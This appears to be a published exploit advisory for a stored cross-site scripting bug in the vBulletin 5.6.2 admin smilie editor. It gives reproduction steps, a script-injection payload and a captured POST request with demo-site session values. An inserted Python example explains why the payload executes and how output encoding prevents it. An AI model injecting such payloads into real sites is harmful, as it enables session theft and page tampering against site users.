## https://sploitus.com/exploit?id=PACKETSTORM:158893
# Exploit Title: vBulletin 5.6.2 Stored XSS  
# Date: 15.08.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://www.vbulletin.com/en/features/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog : https://pentest-vincent.blogspot.com/  
# PoC: https://pentest-vincent.blogspot.com/2020/08/vbulletin-562-stored-xss.html  
  
PoC:  
  
Go to the Admin panel -> open Smilies -> Smilies manager -> Edit Smilie Categories -> edit Smile:  
  
https://72329406fb3a-041342.demo.vbulletin.net/admincp/index.php  
  
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4  
  
Put the code below in the "Title" or "Text to Replace" field, or in the other fields.  
  
The code:  
  
""><script>alert("field")</script><marquee>test</marquee>  
  
Then save the changes. The result is a stored XSS and HTML code injection.  
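
Why the payload above executes, as an added example (not part of the original advisory and not vBulletin's code): the leading `">` closes the `value` attribute and the `<input>` tag of an edit form that interpolates the stored title raw, while HTML-encoding the value on output keeps it inside the attribute. The form template and the function names are hypothetical; the stored value is the `title` parameter from the request on this page.

```python
from html import escape
from html.parser import HTMLParser

# The value the PoC stores in the smilie "Title" field (taken from the page).
STORED_TITLE = 'Smile""><script>alert("field")</script><marquee>test</marquee>'


def render_unescaped(title: str) -> str:
    """Hypothetical edit-form template that interpolates the stored value raw."""
    return '<input type="text" name="title" value="' + title + '">'


def render_escaped(title: str) -> str:
    """Same template with the value HTML-encoded for an attribute context."""
    return '<input type="text" name="title" value="' + escape(title, quote=True) + '">'


class TagCollector(HTMLParser):
    """Records every start tag and the value attribute of the input element."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def parse_fragment(markup: str):
    """Return (start tags seen, value of the input) for a rendered fragment."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.input_value


if __name__ == "__main__":
    # Raw output yields extra script/marquee elements; encoded output yields
    # a single input whose value round-trips to the stored string.
    for render in (render_unescaped, render_escaped):
        tags, value = parse_fragment(render(STORED_TITLE))
        print(f"{render.__name__}: tags={tags} value={value!r}")
```

Encoding at output time leaves the stored string unchanged in the database, so the fix belongs in every template that prints these fields, not only in the save handler.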
  
Picture:  
  
https://imgur.com/a/JUsmPye  
  
Video:  
  
https://www.youtube.com/watch?v=D526ZLgH90Y&feature=youtu.be  
  
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=update  
Host: 72329406fb3a-041342.demo.vbulletin.net  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 399  
Origin: https://72329406fb3a-041342.demo.vbulletin.net  
Connection: keep-alive  
Referer: https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4  
Cookie: vb41342lastvisit=1597392323; vb41342lastactivity=1597521919; vb41342np_notices_displayed=; vb41342contentlist_perpage=25; vb41342sessionhash=845f579d01bdd42b4bf3020d4893f366; PHPSESSID=d8cafaa942534428ce54ea2ba5a221ec7ed9532a6d9666b8; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41342cpsession=18ca6bf5d79e5564ac2aa3a201612500; vb41342sitebuilder_active=1  
Upgrade-Insecure-Requests: 1  
s=845f579d01bdd42b4bf3020d4893f366&do=update&adminhash=38c14dd475e4de2e3f95676226993ebd&securitytoken=1597523664-7fba45cf7add9630b2fda3e409ad0da7beec797c&title=Smile""><script>alert("field")</script><marquee>test</marquee>&smilietext=:)&imagespath=smile.png&imagecategoryid=4&displayorder=1&id=1&table=smilie&page=1&perpage=20&massmove=0&returnimagecategoryid=4  
POST: HTTP/1.1 200 OK  
Date: Sat, 15 Aug 2020 20:34:36 GMT  
  
X-Frame-Options: sameorigin  
Content-Security-Policy: frame-ancestors 'self'  
Expires: 0  
Cache-Control: private, post-check=0, pre-check=0, max-age=0  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Connection: keep-alive, Keep-Alive  
Keep-Alive: timeout=2, max=100  
Transfer-Encoding: chunked  
Content-Type: text/html; charset=UTF-8  
  
P.S.  
Today I have no idea how to use this bug, because only the admin user
has access to the admincp and can insert XSS code in the fields.